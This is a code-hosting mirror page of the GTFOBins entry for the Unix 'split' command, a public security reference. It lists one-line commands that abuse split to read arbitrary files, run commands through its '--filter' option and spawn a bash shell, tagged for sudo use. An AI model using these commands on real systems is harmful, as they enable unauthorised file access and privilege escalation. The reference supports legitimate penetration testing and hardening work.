This website requires JavaScript.
Explore
Help
Sign In
public-mirrors
/
GTFOBins.github.io
Watch
1
Star
0
Fork
0
You've already forked GTFOBins.github.io
mirror of
https://github.com/GTFOBins/GTFOBins.github.io
synced
2025-11-05 03:08:35 +01:00
Code
Issues
Projects
Releases
Wiki
Activity
Files
de10e4761e05be39fc1b4aa4ade51b862c038f44
GTFOBins.github.io
/
_gtfobins
/
split.md
Emanuel Duss
cb7cb672f2
New command: split
2020-11-13 11:59:14 +01:00
595 B
Raw
Blame
History
functions
functions
file-read
command
shell
sudo
code
LFILE=file_to_read TF=$(mktemp) split $LFILE $TF cat $TF*
description
Command execution using an existing or new created file.
code
COMMAND=id TF=$(mktemp) split --filter=$COMMAND $TF
description
code
Command execution using stdin (and close it directly).
COMMAND=id echo | split --filter=$COMMAND /dev/stdin
code
split --filter=bash /dev/stdin
code
split --filter=bash /dev/stdin
Reference in New Issue
View Git Blame
Copy Permalink